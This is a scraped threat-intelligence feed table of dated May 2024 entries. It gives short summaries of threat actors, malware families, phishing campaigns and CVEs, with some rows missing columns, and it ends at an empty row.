DATE | NAME | CATEGORY | SUBCATE | INFO |
31.5.24 | GRU’s BlueDelta Targets Key Networks in Europe | REPORT | REPORT | GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns |
31.5.24 |
BlueDelta | Operation | Operation | GRU's BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns |
31.5.24 |
Doppelganger | Operation | Operation | This page is designed to gather a timeline of the Doppelganger operation with a few elements collected from different reports. |
31.5.24 | AI and Covert Influence Operations: Latest Trends | REPORT | AI | OpenAI is committed to enforcing policies that prevent abuse and to improving transparency around AI-generated content. |
31.5.24 |
UAC-0006 | Group | Group | UAC-0006 is a financially motivated threat actor that has been active since at least 2013. They primarily target Ukrainian organizations, particularly accountants, with phishing emails containing the SmokeLoader malware. Their goal is to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems. |
31.5.24 | CVE-2024-1086 | CVE | A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. | |
31.5.24 | CVE-2023-38831 | CVE | RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. | |
31.5.24 |
FlyingYeti | Group | Group | Cloudforce One is publishing the results of our investigation and real-time effort to detect, deny, degrade, disrupt, and delay threat activity by the Russia-aligned threat actor FlyingYeti during their latest phishing campaign targeting Ukraine. |
31.5.24 |
Malicious activity by LilacSquid threat group | ALERTS | GROUP | A recently disclosed infostealing campaign attributed to the threat group known as LilacSquid has been active since at least 2021. As reported by Cisco Talos, the attackers have been targeting vulnerable public-facing servers and leveraging compromised RDP credentials to deploy a wide range of tools and malware in their attacks. |
31.5.24 |
Unveiling cryptocurrency mining tactic of the 8220 Gang | ALERTS | CRYPTOCURRENCY | The 8220 Gang, a widely recognized threat actor based in China and driven by financial motives, has been active since 2017. Specializing in deploying cryptocurrency-mining malware, they primarily target cloud-based environments and Linux servers, exploiting known application vulnerabilities as part of their tactics, techniques, and procedures (TTPs). |
31.5.24 |
SmallTiger malware campaign reported targeting Korean companies | ALERTS | CAMPAIGN | A malware campaign distributing SmallTiger malware has been reported targeting Korean companies in the defence, automobile parts, and semiconductor manufacturing sectors. This malware acts as a downloader, connecting to the attackers' C&C server to fetch and execute the final payload in memory. |
30.5.24 |
AhMyth | Malware | Android | AhMyth is malware that spreads through a few different infection vectors and uses various means to collect and exfiltrate sensitive information from infected devices. |
30.5.24 |
RedTail | Malware | Cryptocurrency | RedTail Cryptominer Threat Actors Adopt PAN-OS CVE-2024-3400 Exploit |
30.5.24 | CVE-2023-6961 | CVE | (CVSS score: 7.2) - Unauthenticated Stored Cross-Site Scripting in WP Meta SEO <= 4.5.12 | |
30.5.24 | CVE-2023-40000 | CVE | (CVSS score: 8.3) - Unauthenticated Stored Cross-Site Scripting in LiteSpeed Cache <= 5.7 | |
30.5.24 | CVE-2024-2194 | CVE | (CVSS score: 7.2) - Unauthenticated Stored Cross-Site Scripting in WP Statistics <= 14.5 | |
30.5.24 |
LilacSquid | Group | Group | The stealthy trilogy of PurpleInk, InkBox and InkLoader |
30.5.24 |
BitRAT and Lumma Stealer spread as fake browser updates | ALERTS | Virus | A new campaign delivering BitRAT and Lumma Stealer malware has been observed in the wild. The malware is spread via fake browser updates. The attack chain is initiated by users visiting compromised websites and triggering malicious JavaScript code that redirects them to fake update websites. Further down the chain, malicious PowerShell scripts lead to the retrieval of malware loaders and final payload execution. The attackers can leverage the delivered payloads to gain control over the compromised endpoints, execute remote commands, and steal information. |
30.5.24 |
Metamorfo Banking Trojan | ALERTS | Virus | Metamorfo is a banking Trojan malware (aka Casbaneiro) that is spread through malspam campaigns luring users to click on HTML attachments. The HTML attachment contains malicious code that kicks off processes with the main focus on exfiltrating victims’ financial information including banking credentials. |
30.5.24 |
Datebug updating toolkits with Golang to be cross-platform | ALERTS | APT | APT group Datebug, in operation since 2013, has been observed updating their toolkit with a new data exfiltration tool written in Golang created with the goal of targeting APAC governments and defense sectors. The group utilizes phishing emails to lure recipients into opening an attached or linked malicious ZIP or ISO file which leads to the data exfiltration tool being installed. |
30.5.24 |
NSIS-based packer usage observed in many common malware families | ALERTS | Virus | The Nullsoft Scriptable Install System (NSIS) is a commonly seen open source software used by cybercriminals for generating malware. This system is used to generate self-extracting custom installers which have been observed delivering many different malware families. In a recent report by Check Point Research, they have provided details on a group of packers using this system. |
30.5.24 |
CatDDoS: A rising threat across multiple sectors | ALERTS | BOTNET | A rise in activity involving a Mirai distributed denial-of-service (DDoS) botnet variant called CatDDoS has been observed. Multiple threat actors are employing various CatDDoS variants to target organizations across multiple sectors, including cloud vendors, communication providers, scientific and research entities, and educational institutions. The vulnerabilities exploited under CatDDoS affect numerous products and technologies, such as Jenkins servers, Apache ActiveMQ servers, Apache Log4j, Cisco Linksys, and NetGear routers, among others. |
30.5.24 |
Mexican Telecom Continuously Impersonated by SpyNote Actor | ALERTS | Virus | Since at least October 2023, a SpyNote actor has been abusing the brand of a well-known and prominent telecommunications company in Mexico that operates extensively across Latin America and the Caribbean, serving millions of customers in countries such as Argentina, Brazil, Chile, Colombia, and many more. |
30.5.24 |
AllaSenha - new AllaKore malware variant | ALERTS | Virus | AllaSenha is a new banking malware variant from the AllaKore RAT family that has recently been used in distribution campaigns targeted at banking users in Brazil. The multi-staged infection chain leverages malicious .lnk files possibly delivered through phishing, BPyCode launcher binaries and a DLL loader dubbed ExecutorLoader that leads to the final AllaSenha payload. The malware functionality focuses on theft of user credentials associated with Brazil’s most popular banks. The targeted data includes passwords, QR codes and 2FA tokens. The malware abuses Azure Cloud infrastructure for the purpose of C2 communication and data exfiltration. |
30.5.24 |
Zonix Ransomware | ALERTS | RANSOM | Zonix is a recently discovered ransomware variant from the Xorist malware family. The malware encrypts user files and appends the ".ZoN" extensions to them. Zonix drops a ransom note as a text file called "HOW TO DECRYPT FILES.txt" and also displays a pop-up window on the desktop demanding 1500 USD in bitcoin for the decryption of the locked files. |
30.5.24 |
CVE-2024-32640 - SQL Injection vulnerability in Mura/Masa CMS | ALERTS | VULNERABILITY | CVE-2024-32640 is a recently disclosed SQL injection vulnerability affecting Mura/Masa CMS, which is an open source enterprise content management system. If successfully exploited, the vulnerability might allow unauthorized attackers to access sensitive data. The product vendor has already released a patch to remediate this vulnerability in software versions 7.4.6, 7.3.13 and 7.2.8. |
30.5.24 |
Emergence of a new North Korean threat actor dubbed Moonstone Sleet | ALERTS | APT | A recent emergence in the threat landscape involves a new North Korean actor dubbed Moonstone Sleet. This actor has been detected engaging in various deceptive tactics, including the establishment of fake companies and job listings to lure potential targets. Additionally, they have been distributing trojanized versions of legitimate software tools, developing malicious games, and introducing a novel custom ransomware named FakePenny, comprising a loader and an encrypter. Their targets span individuals and organizations across sectors such as software and information technology, education, and defense industrial base. |
30.5.24 |
Fraudulent PDF Viewer Login Pages Phishing for User Credentials | ALERTS | PHISHING | A phishing campaign was recently observed where a malicious HTML attachment masquerading as a PDF Viewer login page prompts users to verify their password to access a document. Meanwhile, hidden in the background, a malicious JavaScript will attempt to steal the victim's credentials. |
30.5.24 |
Agent Tesla: The Uninvited Guest at Indonesia's GEMASTIK 2024 Event | ALERTS | Virus | Symantec has recently observed a peculiar malspam campaign in Indonesia where the actor is running a sophisticated email scheme impersonating the School of Electrical Engineering and Informatics (STEI) at the Institut Teknologi Bandung (ITB) in Indonesia. |
30.5.24 |
Red Akodon threat group recent activities | ALERTS | Virus | According to a recent report published by SCITUM, Red Akodon is a new threat group conducting its malicious activities predominantly in Colombia since at least April 2024. The threat actors have been observed to target various public organizations and other businesses with a variety of commodity malware variants such as Remcos, QuasarRAT, Neshta, XWorm or AsyncRAT. The attack chain often relies on phishing emails coming from compromised accounts. The attackers have been leveraging malicious .svg files either directly attached in malspam or hosted on public file hosting repositories. The attacks conducted by this threat group aim at information exfiltration and gaining control over the compromised endpoints. |
30.5.24 |
TXZ file extension: Evolution of malware distribution in email campaigns | ALERTS | Virus | Threat actors usually send malicious emails with attachments carrying a malicious payload, or they send out containers which include files like archives. In a recent campaign, multiple emails carrying files with the TXZ extension as attachments were observed. Late last year, Microsoft added native support to Windows 11 for the TXZ filetype. This means recipients of the malicious messages would have been able to open the TXZ attachment using Windows File Explorer if they are using the Windows 11 operating system. This shows that TXZ campaigns are actively used in some regionally targeted campaigns and can grow in the future with the adoption of Windows 11 or higher. |
30.5.24 |
Gipy malware distributed under the disguise of AI voice generator tools | ALERTS | Virus | A new malicious campaign spreading infostealing malware dubbed Gipy has been observed in the wild. The malware binaries are masqueraded as an AI voice generator tool and distributed via phishing websites. Some examples of the package names observed for this malware are as follows: VoiceAIbeta-x64.exe, VoiceAIAdvancedPro.exe, VoiceAiPro-x64.exe, VoiceAIChanger.exe, etc. Next to typical infostealing features, the malware has capabilities to download and execute additional arbitrary payloads. Various malware families have been observed among the malware payloads downloaded by Gipy, including: Lumma Stealer, Redline Stealer, DCRat, RadxRAT, RisePro, TrueClient and more. |
30.5.24 |
Operation Endgame | BigBrother | BigBrother | International law enforcement and partners have joined forces. We have been investigating you and your criminal undertakings for a long time and we will not stop here. |
30.5.24 |
Detecting Cross-Origin Authentication Credential Stuffing Attacks | Incident | Incident | Okta has determined that the cross-origin authentication feature in Customer Identity Cloud (CIC) is prone to being targeted by threat actors orchestrating credential-stuffing attacks. |
30.5.24 |
PyPI crypto-stealer | Malware | Python | PyPI crypto-stealer targets Windows users, revives malware campaign |
29.5.24 | CVE-2024-24919 | CVE | Important Security Update – Stay Protected Against VPN Information Disclosure (CVE-2024-24919) | |
29.5.24 |
AllaSenha | Malware | RAT | ALLASENHA: ALLAKORE VARIANT LEVERAGES AZURE CLOUD C2 TO STEAL BANKING DETAILS IN LATIN AMERICA |
29.5.24 |
Moonstone Sleet | Group | APT | Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks |
28.5.24 | CVE-2024-23109 | CVE | An improper neutralization of special elements used in an OS command ('OS command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows an attacker to execute unauthorized code or commands via crafted API requests. | |
28.5.24 | CVE-2024-23108 | CVE | An improper neutralization of special elements used in an OS command ('OS command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows an attacker to execute unauthorized code or commands via crafted API requests. | |
28.5.24 |
DNSBOMB: A New Practical-and-Powerful Pulsing DoS Attack Exploiting DNS Queries-and-Responses | Papers | DNS | DNSBomb is a new practical and powerful pulsing DoS attack exploiting DNS queries and responses. |
28.5.24 |
DNSBomb | Hacking | DNS | DNSBomb is a new practical and powerful pulsing DoS attack exploiting DNS queries and responses. |
28.5.24 |
CatDDoS Botnet | BOTNET | BOTNET | XLab's CTIA(Cyber Threat Insight Analysis) System continuously tracks and monitors the active mainstream DDoS botnets. Recently, our system has observed that CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months. Additionally, the maximum number of targets has been observed to exceed 300+ per day. |
28.5.24 |
Server Side Credit Card Skimmer Lodged in Obscure Plugin | Hacking | Hacking | Attackers are always finding new ways to inject malware into websites and new ways to obscure it to avoid detection, but they’re always up to their same old tricks. In this post, we’ll explore how attackers are using a very obscure PHP snippet WordPress plugin to install server-side malware to harvest credit card details from a WooCommerce online store. |
28.5.24 | Remote Command Execution on TP-Link Archer C5400X | CVE | Before the release of our binary zero-day identification feature, we tested and validated it on our firmware corpus to make sure we were providing meaningful analysis results. In the process, we identified numerous vulnerabilities that we reported to vendors. | |
28.5.24 | CVE-2024-5035 | CVE | The affected device exposes a network service called "rftest" that is vulnerable to unauthenticated command injection on ports TCP/8888, TCP/8889, and TCP/8890. | |
28.5.24 |
Embargo Ransomware | ALERTS | RANSOM | Embargo is a new Rust-based ransomware variant identified in the wild. The malware encrypts user files and appends the “.564ba1” extension to them. The ransom note is dropped in the form of a text file called “HOW_TO_RECOVER_FILES.txt”, advising the victims to register on the attackers' portal via the provided onion site link. The threat actors behind this malware have been reported to employ the double extortion technique, not only encrypting confidential data but also exfiltrating it and threatening the victims with public release. |
28.5.24 |
Rising popularity of Arc browser overshadowed by malvertising campaign | ALERTS | CAMPAIGN | The Arc browser, developed by The Browser Company, has been gaining a lot of popularity in the market, promising to personalize the way users browse the internet. With its innovative user interface design that sets it apart from traditional browsers, it started receiving even more attention after becoming available for Windows, whereas previously it was only intended for macOS systems. |
28.5.24 |
Phishing campaign targeting financial institutions impersonates medical center | ALERTS | PHISHING | A phishing campaign targeting European and US financial institutions has been reported. The attacks involve sending emails impersonating a medical center, with SCR files disguised as financial documents to trick victims into downloading and executing them. These files contain code from a Python clone of the Minesweeper game, along with malicious Python code that downloads additional scripts from a remote source. The scripts are then used to extract and run a legitimate remote computer management program called SuperOps RMM which provides unauthorized remote access to victims' computers. |
28.5.24 |
Iluria Stealer | ALERTS | Virus | There have been reports of in-the-wild activity for a run-of-the-mill stealer known as Iluria. Like many other forks and variants of Discord Stealers, it is capable of stealing tokens, browser credentials, and payment information. The malware is currently being advertised, and for now, consumers appear to be the focus via drive-by-download attacks. In addition, multiple tests are also being observed. |
28.5.24 |
Rise of Fake AV websites hosting advanced malware | ALERTS | Virus | Recently, there has been an increase in the number of fake antivirus (AV) websites pretending to be legitimate solutions. These deceptive sites have been found hosting advanced malicious files, such as APKs, EXEs, and Inno Setup installers, which can deliver spyware like the SpyNote Trojan and data-stealing malware such as Lumma and StealC. These malicious programs are adept at harvesting victim information, including browser data, and sending it to remote servers under the control of attackers. |
28.5.24 |
CVE-2024-30268: XSS Vulnerability in Cacti | ALERTS | VULNERABILITY | CVE-2024-30268 is a reflected cross-site scripting vulnerability in Cacti, a network monitoring and fault management framework. If successfully exploited, this vulnerability allows attackers to obtain the cookies of the administrator and fake their login using the cookies. The vulnerability has been fixed in versions 1.3.x DEV. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system. |
28.5.24 |
CVE-2024-21793 and CVE-2024-26026 - two recent vulnerabilities affecting F5 BIG-IP Next Central Manager | ALERTS | VULNERABILITY | CVE-2024-21793 and CVE-2024-26026 are two recently identified high severity vulnerabilities affecting the F5 BIG-IP Next Central Manager. Both flaws are code injection vulnerabilities and have been given a CVSS score of 7.5. If successfully exploited, they might allow unauthenticated attackers to run malicious SQL statements through the BIG-IP Central Manager API. |
28.5.24 |
CVE-2020-17519: Directory Traversal Vulnerability in Apache Flink | ALERTS | VULNERABILITY | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently added a three-year-old directory traversal vulnerability (CVE-2020-17519) in Apache Flink to the Known Exploited Vulnerabilities Catalog. Apache Flink is an open-source batch-processing framework used for distributed processing of streaming data and is widely used in the field of big data. If successfully exploited, this vulnerability allows unauthenticated attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. |
28.5.24 |
Android Bankbot impersonates Uzbekistan banks | ALERTS | Virus | In recent days, mobile users in Uzbekistan have been targeted by an Android BankBot campaign where actors are disguising their malware as fictitious banking apps (Xalq Banki Credit.apk & Bank Ipak.apk), impersonating two Uzbekistan banks: Xalq Banki and Ipak Yuli. If a user is successfully lured into installing these on their mobile phone, BankBot will monitor for when the user launches any banking apps it is coded to target. It will then leverage the classic overlay technique, overlaying a fake page on top of the legitimate one in order to steal the user's inputs, such as credentials. At this time, the vector of infection remains unknown but it's very likely that these are being spread via malicious SMS messages or redirections. |
27.5.24 |
Storm-0539 | Group | Group | Navigating cyberthreats and strengthening defenses in the era of AI |
27.5.24 |
HTML Smuggling | Hacking | HTML | HTML smuggling is an innovative attack technique, which abuses HTML5 and JavaScript features to inject or extract data across network boundaries. |
27.5.24 |
Transparent Phishing and HTML Smuggling | Hacking | Phishing | Phishing with Cloudflare Workers: Transparent Phishing and HTML Smuggling |
27.5.24 |
Transparent Tribe | Campaign | Campaign | Transparent Tribe Targets Indian Government, Defense, and Aerospace Sectors Leveraging Cross-Platform Programming Languages |
25.5.24 | Group | Space Pirates: analyzing the tools and connections of a new hacker group ||
25.5.24 | Path Traversal Vulnerability in Nexus Repository CVE-2024-4956 | VULNERABILITY | CVE-2024-4956 is a path traversal vulnerability in Sonatype Nexus Repository 3. Nexus Repository is a widely used artifact repository manager. If successfully exploited, this vulnerability allows unauthenticated remote attackers to access and download sensitive system files, application source code and configurations. The CVSS score of this vulnerability is 7.5. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system. | |
25.5.24 | APT | An ongoing campaign dubbed Operation Diplomatic Specter, targeting political entities in the Middle East, Africa, and Asia, has been reported. A Chinese APT group behind the campaign has been leveraging rare email exfiltration techniques against compromised servers. ||
25.5.24 | RustDoor malware exploits JAVS Viewer vulnerability in courtroom software | Virus | A Windows-based malware named RustDoor has been observed being distributed via a compromised audio-visual recording software package used in courtroom environments. This backdoor enables attackers to gain full control of affected systems and transmit data about the host system to a command-and-control (C2) server. The malware exploits a deserialization vulnerability in JAVS Viewer software, tracked as CVE-2024-4978. JAVS technologies are utilized in courtrooms, jails, prisons, councils, hearings, and lecture halls nationwide, with more than 10,000 installations worldwide. | |
25.5.24 | CVE | Type Confusion in V8. Reported by Clément Lecigne of Google's Threat Analysis Group and Brendon Tiszka of Chrome Security on 2024-05-20 ||
25.5.24 | Group | No sleep until the Cybercrime Fighters Club is done with finding the answer as to who is behind this new ransomware-as-a-service affiliate. ||
25.5.24 | CVE | CVE-2024-4978: Backdoored Justice AV Solutions Viewer Software Used in Apparent Supply Chain Attack ||
25.5.24 | RAT | BLOODALCHEMY used in attacks targeting government organizations in Southern and Southeastern Asia is in fact an updated version of Deed RAT, which is believed to be a successor to ShadowPad. ||
25.5.24 | RAT | Malware Transmutation! - Unveiling the Hidden Traces of BloodAlchemy ||
24.5.24 | Hacking | ESXi Ransomware Attacks: Evolution, Impact, and Defense Strategy ||
24.5.24 | CVE | A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. ||
24.5.24 | APT | SHARP DRAGON EXPANDS TOWARDS AFRICA AND THE CARIBBEAN ||
23.5.24 | APT | As reported by Checkpoint, the Sharp Dragon APT group (also formerly known as Sharp Panda) has been expanding its operations towards targets in Africa and in the Caribbean. Sharp Dragon is known to use large-scale phishing attacks, malicious RTF files and DLL loaders, but most recently also executable loaders disguised as documents. The threat group has also been reported to leverage the CVE-2023-0669 RCE vulnerability affecting Fortra GoAnywhere in their attacks. ||
23.5.24 | VULNERABILITY | CVE-2024-29895 is a critical (CVSS score 10) command injection vulnerability affecting Cacti, which is a network monitoring and fault management framework. If successfully exploited, the vulnerability may allow unauthenticated remote attackers to execute arbitrary commands on the affected servers through URL manipulation. While the vulnerability has not yet been reported as being exploited in the wild, a Proof of Concept for it is publicly available. The product vendor has already released a patch to remediate this vulnerability. ||
23.5.24 | HACKING | Waltuhium is an open-source infostealer that has been observed being shared in dark web forums. It is claimed to have features such as keylogging, screenshot capturing, WiFi stealing, Discord injection, password stealing, credit card stealing, cryptocurrency and wallet stealing, as well as tokens from Discord and browsers, and session stealing. Additionally, it has anti-VM and anti-debug functionality. The stolen data is zipped and posted to a defined Discord webhook server. ||
23.5.24 | Virus | GuLoader, an advanced downloader, is showing no signs of stopping, and its prevalence continues to increase with more and more campaigns observed around the world. One campaign was recently identified where actors are posing as a known Italian company that specializes in the wholesale and retail distribution of seafood, sourcing and importing its products from various countries. ||
23.5.24 | CLOUD#REVERSER campaign leverages cloud storage for malware delivery | CAMPAIGN | A new campaign dubbed CLOUD#REVERSER has been reported to abuse various cloud storage repositories such as Dropbox or Google Drive for malware delivery and C&C purposes. The attackers leverage phishing emails with malicious attachments in the initial attack stages and several VBScript and PowerShell-based payload executions in later stages. The dropped malware has the functionality to exfiltrate user data, execute arbitrary commands and scripts received from the attackers as well as download additional binaries and execute them on the infected endpoints. | |
23.5.24 | Virus | Acrid is a recently identified C++-based infostealing malware. In its functionality, it is very similar to other infostealer variants currently present in the threat landscape. Its main functionality relies on collecting various user data from the compromised endpoints and exfiltrating it to the C&C servers controlled by the attackers. Acrid focuses on the theft of data such as browser cookies, passwords stored in browsers, banking information, cryptocurrency wallets, and credentials stored in various applications. Acrid has been reported to leverage the "Heaven’s Gate" technique, which enables 64-bit code to be executed within a 32-bit process, potentially allowing the malware to evade security controls that monitor only 32-bit processes. ||
23.5.24 | CVE-2023-43208 - NextGen Healthcare Mirth Connect RCE vulnerability exploited in the wild | VULNERABILITY | CVE-2023-43208 is a Remote Code Execution (RCE) vulnerability disclosed in October last year. The vulnerability affects NextGen Healthcare Mirth Connect prior to version 4.4.1, which is an open-source data integration suite used by healthcare companies. If exploited, the vulnerability may allow unauthenticated remote attackers to execute code on affected systems, leading to the compromise of critical healthcare data. The vulnerability has been reported as being exploited in the wild and has been added to the "Known Exploited Vulnerabilities Catalog" (KEV) by CISA. | |
23.5.24 | GhostEngine malware terminates EDR agents and deploys coin miner | Virus | A multi-module malware dubbed GhostEngine has been observed in the wild. This malware leverages vulnerable drivers to terminate and delete known Endpoint Detection and Response (EDR) agents that would likely interfere with the deployed coin miner. | |
23.5.24 | Operation | Operation Diplomatic Specter: An Active Chinese Cyberespionage Campaign Leverages Rare Tool Set to Target Governmental Entities in the Middle East, Africa and Asia ||
23.5.24 | CVE | Avalanche 6.4.3.602 - additional security hardening and CVE fixed ||
23.5.24 | Group | Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South China Sea ||
23.5.24 | Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. | |||
23.5.24 | Exchange | Positive Technologies detects a series of attacks via Microsoft Exchange Server ||
22.5.24 | Smishing: Fake IRS Scare Tactic to Snatch Cryptowallets' 12-Word Recovery Phrases | PHISHING | Symantec has recently observed a malicious SMS campaign in the US targeting mobile users' cryptowallet 12-word recovery phrases. The actors are impersonating the IRS and using a scare tactic related to cryptocurrency holdings declaration. | |
22.5.24 | Virus | A new v5.6 variant of the XWorm malware has been observed in the wild. The malware is distributed under the disguise of various applications, games or adult content, with the binaries spread through either online sharing repositories or via torrent downloads. XWorm has miscellaneous capabilities including keylogging, data theft, download of additional arbitrary payloads, RAT functionalities and others. ||
22.5.24 | Malware campaign uses LNK files and MSBuild to likely deliver TinyTurla backdoor | Virus | A malware campaign utilizing malicious LNK files has been observed. The threat actors behind the campaign are using human rights seminar invitations and public advisories to lure users. Once lured, MSBuild is used to execute and deliver a fileless final payload. This payload is believed to be the TinyTurla backdoor, based on its first-stage backdoor functionalities and utilization of a specific C2 infrastructure. | |
22.5.24 | Virus | A new campaign attributed to the Grayfly threat group (aka APT41) has been distributing the Keyplug modular malware to various organizations in Italy. As reported by Yoroi, this C++-based malware comes in variants supporting both Windows and Linux platforms. Keyplug can initiate C2 communication with attacker servers either via abuse of Cloudflare's CDN (Content Delivery Network) or via the WSS protocol. ||
22.5.24 | CVE | (CVSS score: 2.7), which allows a privileged user to read backup session logs ||
22.5.24 | CVE | (CVSS score: 7.2), which allows a privileged user to steal NTLM hashes of a Veeam Backup Enterprise Manager service account if it's not configured to run as the default Local System account ||
22.5.24 | CVE | (CVSS score: 8.8), which allows account takeover via NTLM relay ||
22.5.24 | CVE | (CVSS score: 9.8), the vulnerability could allow an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user. ||
22.5.24 | CVE | A set of buffer overflow vulnerabilities that could allow authenticated users to execute arbitrary code via a network ||
22.5.24 | CVE | A set of buffer overflow vulnerabilities that could allow authenticated users to execute arbitrary code via a network ||
22.5.24 | CVE | A set of buffer overflow vulnerabilities that could allow authenticated users to execute arbitrary code via a network ||
22.5.24 | CVE | A double free vulnerability that could allow authenticated users to execute arbitrary code via a network ||
22.5.24 | CVE | An incorrect permission assignment for critical resource vulnerability that could allow authenticated users to read or modify the resource via a network ||
22.5.24 |
InfoStealer |
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware |
||
22.5.24 |
CVE |
An authentication bypass vulnerability was present in the GitHub Enterprise Server (GHES) when utilizing SAML single sign-on authentication with the optional encrypted assertions feature. |
||
22.5.24 |
CVE |
llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. |
||
21.5.24 |
CVE |
NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679. |
||
21.5.24 |
CVE |
A memory corruption vulnerability in Fluent Bit versions 2.0.7 through 3.0.3. This issue lies in the embedded HTTP server's parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution. |
||
21.5.24 |
Deuterbear RAT targets Asia-Pacific in advanced cyber espionage campaign |
Virus |
A cyber espionage campaign has been reported targeting the Asia-Pacific region, involving the deployment of a remote access trojan (RAT) called Deuterbear. The RAT exhibits advanced capabilities, such as anti-analysis techniques, avoiding handshakes during RAT operation, anti-memory scanning, and using HTTPS for command-and-control (C&C) communication. The Deuterbear infection chain involves two stages: the first stage functions as a plugin downloader, while the second stage acts as a backdoor, harvesting sensitive information from the compromised host. |
|
21.5.24 |
Virus |
Reports have emerged of a new infostealer, dubbed SamsStealer, circulating in the threat landscape. This malware covertly infiltrates victims' systems, exfiltrating various forms of personal data, including login credentials, cryptocurrency wallets, session data, and browsing history. The stolen data is transmitted to file-sharing services and messaging platforms like Telegram, which are used as command-and-control (C2) servers by the attackers. |
||
21.5.24 |
Bank Mellat Users in Various Countries Targeted by FakeBank Campaign |
CAMPAIGN |
Symantec has observed an Android FakeBank campaign targeting mobile users of a private Iranian bank known as Mellat, by posing as a fictitious banking app (Mellat.apk). Bank Mellat, also known as "Bank of the Nation", has a number of offices and branches both domestically within Iran and internationally. |
|
21.5.24 |
Virus |
Recently, a Vultur campaign has been observed in which the actor is disguising it as a known antivirus mobile application (<company name>_Security.apk). This Android banking malware leverages the overlay technique, displaying fake overlay windows in the hope of tricking users into entering their banking credentials. It targets hundreds of banks and cryptocurrency exchange platforms. |
||
21.5.24 |
Virus |
HijackLoader is a multi-stage loader that has recently seen some updates. The first stage allows the loader to decrypt and decompress additional modules and execute a second stage, while the second-stage process lives in memory and reads an embedded or remotely hosted image in order to fully initiate the second stage and load additional modules. Some of the newly discovered modules, like the User Account Control bypass, are designed to allow for additional persistence in the target environment. |
||
21.5.24 |
Virus |
Antidot is a recently discovered banking trojan for Android. The malware is distributed under the disguise of a Google Play update app. Functionality-wise, Antidot is capable of keylogging, overlay attacks, SMS exfiltration, screen captures, credential theft, device control and execution of commands received from the attackers. The malware has the capability to establish HTTP connections or WebSocket communication to the C2 servers. |
||
21.5.24 |
RANSOM |
As the Chaos Ransomware builder is widely available to the public, instances are observed on a daily basis around the world with both consumers and enterprises being targeted. Recently, one actor has been luring consumers, more specifically gamers, with a Chaos Ransomware disguised as a fake free Discord Nitro. Within the ransom note, the actor is hoping to extort compromised users of 0.003 BTC, which is the equivalent of 195 USD at the time of writing. |
||
21.5.24 |
RANSOM |
Synapse is a ransomware written in C that can encrypt local files, files on removable drives, and files stored on network shares, with the capability of propagating to other systems on a network. Encrypted files will have the extension .Synapse added to them. Additionally, a ransom note named [random_string].README.txt is dropped. The ransomware has the capability to collect system information and encryption statistics, and exfiltrate the data to its remote C2 server. Victims are provided with a URL (hosted on the Tor network) as a means of contact. |
||
21.5.24 |
Storm-1811 threat actor conducts Vishing attack via Quick Assist tool |
GROUP |
Threat actor Storm-1811 has been reported carrying out a vishing (voice phishing) attack using the client management tool Quick Assist. Quick Assist is an application that enables a user to share their system with another person over a remote connection to resolve issues. Once the user grants full control, the threat actor executes scripts that lead to the download of batch files with the aim of deploying Black Basta ransomware as the final payload throughout the network. |
|
21.5.24 |
APT |
In a newly released report, Symantec's Threat Hunter Team sheds light on a recently discovered Linux backdoor developed by the North Korean Springtail espionage group (aka Kimsuky). This group is linked to malware used in a recent campaign against organizations in South Korea. The campaign leveraged Trojanized software installation packages to deliver the backdoor. |
||
21.5.24 |
Wiper |
No-Justice Wiper - Wiper attack on Albania by Iranian APT |
||
21.5.24 |
Wiper |
Iranian State Actors Conduct Cyber Operations Against the Government of Albania |
||
21.5.24 |
Group |
BAD KARMA, NO JUSTICE: VOID MANTICORE DESTRUCTIVE ACTIVITIES IN ISRAEL |
||
21.5.24 |
Group |
GitCaught: Threat Actor Leverages GitHub Repository for Malicious Infrastructure |
||
20.5.24 |
Loader |
The LATRODECTUS loader evolves to deliver ICEDID and other malware |
||
20.5.24 |
Banking |
Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns |
||
19.5.24 |
Prison Management System - SQL Injection Authentication Bypass |
|||
19.5.24 |
iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) |
|||
19.5.24 |
Vulnerability |
In April 2024, while researching CVE-2023-36033, we discovered another zero-day elevation-of-privilege vulnerability, which was assigned the identifier CVE-2024-30051 and patched on May 14 as part of Microsoft's Patch Tuesday. |
||
19.5.24 |
Incident |
As an information security company, our services include incident response and investigation, and malware analysis. Our customer base spans Russia, Europe, Asia, South and North America, Africa and the Middle East. |
||
18.5.24 |
CVE |
(CVSS score: 9.3) - A use-after-free vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host |
||
18.5.24 |
CVE |
